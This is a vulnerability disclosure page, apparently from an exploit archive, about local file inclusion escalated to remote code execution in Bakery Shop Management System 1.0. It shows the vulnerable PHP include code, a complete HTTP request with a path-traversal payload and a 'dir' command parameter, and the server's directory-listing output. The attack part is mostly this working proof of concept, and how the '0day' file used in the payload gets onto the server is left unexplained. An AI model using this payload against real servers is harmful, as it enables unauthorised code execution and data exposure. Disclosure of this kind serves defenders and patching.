Bakery Shop Management System 1.0 Local File Inclusion

2022.04.06
Credit: Hejap Zairy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Title: Bakery Shop Management System 1.0 LFI To RCE # Author: Hejap Zairy # Date: 06.04.2022 # Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/ # Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php Needs more filtering require_once ``` require_once('DBConnection.php'); $page = isset($_GET['page']) ? $_GET['page'] : 'home'; if($_SESSION['type'] != 1 && in_array($page,array('maintenance','products','stocks'))){ header("Location:./"); exit; } ``` [+] Payload GET ``` GET //bsms/?page=../../../0day&515=dir HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s Upgrade-Insecure-Requests: 1 ``` #Status: CRITICAL #Response ``` <div class="container py-3" id="page-container"> Volume in drive C is OS Volume Serial Number is 2EF1-9DCA Directory of C:\xampp\htdocs\bsms 04/06/2022 04:18 AM <DIR> . 04/06/2022 05:05 AM <DIR> .. 02/14/2022 10:39 AM 16,358 Actions.php 08/04/2021 11:04 PM <DIR> css 02/14/2022 11:55 AM <DIR> database 09/09/2021 11:54 AM <DIR> DataTables 02/14/2022 11:55 AM 865 DBConnection.php 08/05/2021 03:09 AM <DIR> Font-Awesome-master 02/14/2022 12:00 PM 10,407 home.php 02/14/2022 11:07 AM <DIR> images 02/14/2022 02:26 PM 10,018 index.php 09/11/2021 11:40 AM <DIR> js 02/14/2022 11:11 AM 4,372 login.php ``` # Description: Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce # Proof and Exploit: https://i.imgur.com/qLNHh9Q.png https://i.imgur.com/XDSsyNL.jpg


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top